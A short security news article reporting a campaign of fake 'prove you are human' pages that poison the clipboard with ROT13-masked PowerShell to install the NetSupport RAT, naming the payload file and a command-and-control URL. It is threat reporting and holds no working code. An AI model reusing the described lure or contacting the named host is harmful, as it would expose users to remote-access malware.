Cybersecurity analysts have uncovered a sophisticated malware campaign that abuses routine online verification steps to install malicious software on Windows systems globally.

Threat actors are leveraging fake “prove you are human” prompts to lure users into executing harmful PowerShell scripts. These scripts often appear on deceptive websites that imitate trusted platforms like GitHub repositories and DocuSign pages.

The operation tricks victims into copying code into their system’s Run prompt, initiating a multi-stage infection chain that leads to the installation of the NetSupport Remote Access Trojan (RAT).

Researchers at DomainTools report that attackers are using well-crafted social engineering tactics and themed websites to distribute the scripts. These pages are engineered to bypass conventional security tools through layered delivery techniques.

The infrastructure behind the campaign spans multiple domain registrars—Cloudflare, NameCheap, and NameSilo—and utilizes various name servers, making takedown efforts more difficult and ensuring redundancy for malware distribution.

A particularly stealthy technique used in this campaign involves clipboard poisoning. On fake DocuSign pages, users who click a CAPTCHA-like checkbox unknowingly trigger a script that silently copies an encoded payload to their clipboard. This script, masked using ROT13 encoding, decodes into a PowerShell command that downloads further malware, including “wbdims.exe” from GitHub, and ensures it runs on every login by placing it in the startup folder.

Infected machines also contact a command-and-control server at “docusign.sa.com/verification/c.php” to report successful infections and receive additional instructions.

The campaign’s strength lies in exploiting user trust in everyday internet interactions while deploying advanced technical methods to evade detection. By requiring user interaction, attackers cleverly shift part of the execution process onto the victim, making this one of the more sophisticated social engineering attacks seen in recent months.

Stay ahead of emerging cybersecurity threats. For the latest insights and updates on cloud security, follow SOC News.

News Source: CybersecurityNews.com